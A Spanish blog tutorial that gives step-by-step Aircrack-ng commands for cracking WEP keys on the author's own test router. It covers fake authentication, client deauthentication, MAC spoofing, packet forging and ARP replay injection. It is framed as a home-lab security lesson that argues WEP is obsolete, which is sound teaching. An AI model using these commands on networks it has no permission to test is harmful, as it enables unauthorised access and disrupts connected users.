LinuxParty

Hoy vamos a ver algunos ejemplos de pruebas de WiFi usando Aircrack-ng, que es un conjunto de herramientas de seguridad de redes inalámbricas. Nos permite monitorear y exportar paquetes de datos, atacar puntos de acceso y clientes, y descifrar claves WEP y WPA. He incluido algunos enlaces en la parte inferior si alguien quiere investigar más sobre la tecnología inalámbrica, RC4 o Aircrack-ng.

En pocas palabras, vamos a configurar un par de escenarios de prueba y luego veremos algunos métodos de ataque diferentes. Buscaremos nuestro punto de acceso inalámbrico (AP), configuraremos una captura de tráfico, generaremos tráfico de red y luego pasaremos por diferentes métodos para obtener la clave inalámbrica. Durante estos ejemplos, tenga en cuenta la complejidad de la frase de contraseña que se utiliza y las diferentes formas en que se pueden descubrir esas claves. Además, como recordatorio, solo realice pruebas con dispositivos o redes que sean de su propiedad o que tenga permiso expreso por escrito para realizar pruebas.

Para estas pruebas, aquí está mi hardware y configuración actuales:

• Estoy usando una conexión WiFi (no una línea dura)
• Kali 2018.2 (ejecutándose en VMware Workstation 14 Player)
• Adaptador USB inalámbrico Alpha (Modelo: AWUS036NH, FCC ID: UQ2036NH, Controlador: rt2800usb)
• Mi punto de acceso de prueba es un enrutador Linksys WRT54G
  • Tipo de conexión: Configuración automática – DHCP
  • Servidor DHCP: Deshabilitado
• Nota: la primera vez que configuré esto, se necesitaron algunos ajustes para conectar este enrutador a mi enrutador principal

Para comenzar, lo primero que queremos hacer es verificar la interfaz inalámbrica e iniciar un escaneo rápido de airodump-ng para asegurarnos de que podamos detectar nuestro AP de prueba. Para el primer ejemplo de prueba, detallaré los parámetros utilizados, pero los dejaré para los demás.

iwconfig

• Debería ver wlan0, e inicialmente debería mostrarse como Modo: Administrado

iw dev wlan0 scan | egrep “SSID:|DS\ Parameter\ set

Debería ver el SSID de su AP y en qué canal está:

• SSID: starmonkey
• Juego de parámetros DS: canal 11

Originalmente, estaba usando una instancia de Backtrack 5. Como tal, hay algunas diferencias con las que me encontré al intentar usar airodump-ng con Kali 2018.2. En lugar de usar airmon-ng para iniciar su tarjeta inalámbrica en modo monitor, es posible que deba configurar manualmente la interfaz en modo monitor. Es posible que estos pasos no sean necesarios con todas las tarjetas inalámbricas o en todas las configuraciones, pero me funcionaron de manera constante. Lo incluyo en caso de que esto ayude a otras personas que han tenido dificultades para que airodump-ng detecte puntos de acceso en versiones posteriores de Kali.

• Ponga wlan0 en modo monitor manualmente:

ifconfig wlan0 down

iwconfig wlan0 mode monitor

• use 'modo administrado' para volver a poner la tarjeta en modo administrado

ifconfig wlan0 up

iwconfig wlan0

• wlan0 debería mostrarse como Modo: Monitor

• airodump-ng ahora debería poder ver los puntos de acceso

Para el primer ejemplo, generaré una contraseña aleatoria para mi enrutador y usaré un ataque de fragmentación para recuperar la clave.

Ejemplo 1:

• Contraseña: t!k#^ADe6B&C4Cgd
• Modo de red inalámbrica: mixto
• Nombre de red inalámbrica (ESSID): starmonkey
• Canal Inalámbrico: 11 – 2.462GHz
• Modo de seguridad: WEP
• Cifrado WEP: 128 bits 26 dígitos hexadecimales
• No hay filtros MAC habilitados
• Tipo de autenticación: Automático
  • La autenticación de clave compartida es más segura, pero todos los dispositivos de su red también deben ser compatibles con la autenticación de clave compartida
• No hay dispositivos conectados para este ejemplo
• Nota: es posible que desee utilizar 3 o 4 ventanas de terminal para que pueda moverse con facilidad

Con wlan0 en modo monitor, podemos escanear todos los canales, escanear solo un canal o incluso buscar un AP específico en un solo canal. Esto es útil cuando solo queremos ver lo que hay, pero no capturar ningún tráfico. Verifiquemos para asegurarnos de que no haya ningún proceso DHCP que pueda interferir con las pruebas. Esto debe hacerse antes de cada prueba:

airmon-ng check

airmon-ng check kill

En la primera ventana de la terminal, usaremos airodump-ng para obtener la dirección MAC del AP y la interfaz inalámbrica:

airodump-ng wlan0

• Esto escaneará a través de los canales y mostrará los AP que han sido detectados.

• Ctrl+C para cancelar la pantalla airodump-ng

macchanger -s wlan0

En este caso, mi MAC de AP es 00:14:BF:AE:15:6C y mi MAC inalámbrico es 00:C0:CA:92:63:AE. Para el primer ejemplo, escribiré las direcciones MAC reales, pero para los otros ejemplos usaré las abreviaturas tal como las aprendí.

• <AP> = la MAC del punto de acceso
• <MON> = la MAC de nuestra interfaz inalámbrica en modo monitor
• <VIC> = la MAC de la computadora o dispositivo conectado

Entonces, ahora estamos listos para comenzar nuestra captura de tráfico y solo apuntar al dispositivo de prueba.

airodump-ng -c 11 –bssid 00:14:BF:AE:15:6C -w example1 wlan0

• -c es para el canal (11)
• –bssid es el AP MAC
• -w es para escribir la información de captura en un archivo (ejemplo1)
• wlan0 es la interfaz inalámbrica

Cabe señalar que un ataque de fragmentación debe realizarse con un MAC que esté asociado al AP. Dado que no hay otros dispositivos conectados, usaremos aireplay-ng en una segunda ventana de terminal para realizar una autenticación falsa en el AP.

aireplay-ng -1 60 -e starmonkey -a 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE wlan0

• aireplay-ng -1 es para la autenticación falsa
• -e es para el essid (starmonkey)
• -a es para el AP MAC
• -h es para mi wifi MAC
• wlan0 es nuestra interfaz

A estas alturas, debería ver algo similar a esto en la primera pantalla de su terminal:

En una tercera ventana de terminal, use un ataque de fragmentación para obtener un archivo .xor:

aireplay-ng -5 -b 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE wlan0

• aireplay-ng -5 es para un ataque de fragmentación
• -b es el AP MAC
• -h es la MAC inalámbrica
• wlan0 es la interfaz que se utiliza

• Se le pedirá que utilice un paquete. Si tiene éxito, se creará un archivo .xor similar a este:

fragment-0901-144136.xor

A continuación, use packageforge-ng para crear un paquete inyectable y escriba los resultados en un archivo de captura:

packetforge-ng -0 -a 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE -l 192.168.1.101 -k 192.168.1.255 -y fragment-0901-144136.xor -w fragmentation.cap

• -0 se utiliza para generar un paquete de solicitud ARP
• -a es el AP MAC
• -h es la MAC inalámbrica
• -l es la IP de origen (a veces se puede usar 255.255.255.255)
• -k es la IP de destino (a veces se puede usar 255.255.255.255)
• -y usa el archivo PRGA (fragmento-0901-144136.xor)
• -w escribe la información del paquete en un archivo (fragmentation.cap)

Una vez que se ha creado el paquete, ahora podemos inyectarlo en la red para generar nuestro tráfico de #Datos:

aireplay-ng -2 -r fragmentation.cap wlan0

• -2 es para una retransmisión de paquetes interactivos
• -r es para usar un archivo (fragmentation.cap)
• wlan0 es nuestra interfaz

Aquí es donde las cosas comenzarán a ponerse interesantes. Si todo ha ido bien, verá que se envían cientos de paquetes por segundo. También verá un aumento significativo en los paquetes de #Datos capturados en la primera pantalla de su terminal.

A partir de aquí, simplemente espere hasta que se hayan capturado suficientes paquetes para descifrar la clave WEP:

En la cuarta ventana de terminal, intente usar aircrack-ng cuando se hayan capturado aproximadamente 40k-50k paquetes de datos. En este caso, 50k fue suficiente.

aircrack-ng -z example1-01.cap

• -z es para el ataque PTW
• ejemplo1-01.cap es nuestro archivo de captura

• Aircrack-ng también se puede ejecutar utilizando varios archivos de captura a la vez:

aircrack-ng -z *.cap

• Clave WEP: DC3F737A05FE6CBF68A66B2FDF
• Use Ctrl+C para detener la inyección de paquetes, la autenticación falsa y la captura de airodump-ng.

Ejemplo #2:

• Contraseña: peQ784sPfq$!J6#@
• Método Korek Chop Chop
• En este ejemplo, no hay otros dispositivos conectados
• Nota: es posible que desee ejecutar un ping continuo en el AP para aumentar el tráfico
  • En Windows: ping -t <IP>

Verifiquemos los procesos y comencemos la captura de airodump-ng:

airmon-ng check kill

airodump-ng -c 11 –bssid <AP> -w <nombre de archivo> wlan0

Dado que no hay otros dispositivos conectados, realizaremos una autenticación falsa en el punto de acceso nuevamente:

aireplay-ng -1 60 -e starmonkey -a <AP>-h <MON> wlan0

A continuación, usaremos el método Chop Chop de Korek para obtener el archivo .xor:

aireplay-ng -4 -b <AP> -h <MON> wlan0

• Nota: para Korek, use un paquete que tenga un tamaño de al menos 144 bytes

Estará buscando un archivo .xor exitoso que pueda usar con packageforge-ng y se verá similar a esto:

Ahora que tenemos el archivo .xor, usemos packageforge-ng para crear otro paquete de inyección para la red.

packetforge-ng -0 -a <AP> -h <MON> -l 192.168.1.101 -k 192.168.1.255 -y replay_dec-0901-153620.xor -w korek.cap

Luego, al igual que antes, podemos reproducir este paquete para generar los paquetes de datos que necesitamos para descifrar la clave WEP.

aireplay-ng -2 -r korek.cap wlan0

Con poco más de 70k paquetes de #Data capturados, podemos descifrar la clave:

aircrack-ng -z *.cap

• Clave WEP: E34B1EDFA3945161A962DB9C24
• Use Ctrl+C para detener la inyección de paquetes, la autenticación y la captura de airodump-ng.

Ejemplo #3:

• Contraseña: Y6&fjEKDfKqA6A^4
• Modo de seguridad: WEP
• No hay filtros MAC habilitados
• Tipo de autenticación: clave compartida
  • Nota: El uso de la autenticación de clave compartida es un poco más difícil, y descubrí que, por lo general, necesito otro dispositivo conectado al AP si quiero atacar WEP con éxito sin interrumpir el flujo de claves.
• Otros dispositivos están conectados para este ejemplo

Verifiquemos los procesos y comencemos la captura de airodump-ng:

airmon-ng check

airmon-ng check kill

captura:

airodump-ng -c 11 –bssid <AP> -w <nombre de archivo> wlan0

Ahora, dado que estamos en el modo de clave compartida y hay otros dispositivos conectados, vamos a comenzar con la desautenticación de uno de ellos:

aireplay-ng -0 1 -a <AP> -c <VIC> wlan0

Aquí desea prestar mucha atención al flujo de claves. En la captura de pantalla a continuación, notará un mensaje " SKA roto ". Si esto sucede al intentar anular la autenticación, deberá detener la captura de airodump-ng. Idealmente, desea una desautenticación limpia la primera vez, pero hay algunas opciones que puede probar en este punto:

• Detenga y reinicie la captura, realice una sola desautenticación y verifique si hay un buen flujo de claves
• Puede falsificar la MAC de la estación del cliente (00:C0:CA:96:A6:F8):

ifconfig wlan0 down

macchanger –mac <VIC> wlan0

ifconfig wlan0 up

• Nota 1: esto funciona bien para las pruebas caseras, pero puede tener problemas con 2 Mac idénticas en una red
• Nota 2: no olvide volver a cambiar el mac wlan0 cuando termine de obtener el archivo .xor

• • Puede iniciar una captura de airodump-ng e intentar inmediatamente un ataque de fragmentación utilizando la dirección MAC <VIC> en lugar de la dirección MAC habitual <MON>:

aireplay-ng -5 –b <AP> -c <VIC> wlan0

• • Después de capturar un buen flujo de claves de la desautenticación, airodump-ng creará un archivo .xor

Ejemplo de un mensaje ' SKA roto ':

Ejemplo de un buen mensaje de flujo de claves:

A partir de aquí, cambiaremos nuestra MAC <MON> de nuevo a lo que debería ser, y luego usaremos este archivo .xor para realizar una autenticación falsa:

ifconfig mon0 down

 

macchanger –mac <MON> wlan0

 

ifconfig mon0 up

aireplay-ng -1 60 -e starmonkey -y <.xor> -a <AP> -h <MON> wlan0

Use el archivo .xor con packageforge para crear el paquete de inyección:

packetforge-ng -0 -a <AP> -h <MON> -l 255.255.255.255 -k 255.255.255.255 -y <.xor> -w ska.cap

A continuación, vuelva a reproducir el paquete en la red para generar paquetes de #Datos:

aireplay-ng -2 -r ska.cap wlan0

En este momento, el conteo de #Data debería estar aumentando muy bien. En la ventana de autenticación falsa, si las solicitudes de autenticación y los paquetes de desautenticación comienzan a aparecer (similar a la captura de pantalla a continuación), use Ctrl + C para detener la inyección de paquetes, deje que la autenticación falsa se vuelva a autenticar con éxito, luego inicie la inyección de paquetes de nuevo.

Cuando se hayan capturado suficientes paquetes (un poco más de 35k esta vez), descifre la clave:

aircrack-ng -z *.cap

• Clave compartida WEP: A3289F1292D9A06519B75D3A92
• Use Ctrl+C para detener la inyección de paquetes, la autenticación y la captura de airodump-ng
• Recordatorio: cuando termine la prueba, recuerde volver a cambiar su interfaz a Modo: Administrado

Con suerte, esto ha sido útil para cualquier persona que comience a interesarse en la seguridad inalámbrica. También espero que haya quedado claro que, independientemente de su longitud o complejidad, WEP no debe utilizarse para proteger las redes inalámbricas. WEP proporciona una pequeña medida de seguridad para el tráfico de red, pero como hemos visto, debido a su encriptación RC4, cualquier clave puede romperse fácilmente.

Para ejercicios adicionales, es posible que desee probar diferentes ataques, cambiar entre autenticación automática y clave compartida, probar con y sin dispositivos conectados, o cambiar el modo mixto. Jugar con diferentes configuraciones contribuirá en gran medida a aumentar su comprensión de la seguridad inalámbrica. Aquí hay algunos enlaces para aprender más:

• https://www.aircrack-ng.org
• https://en.wikipedia.org/wiki/IEEE_802.11
• https://en.wikipedia.org/wiki/Wireless_LAN
• http://en.wikipedia.org/wiki/Wireless_security#802.11i_security
• https://en.wikipedia.org/wiki/RC4

Whatsapp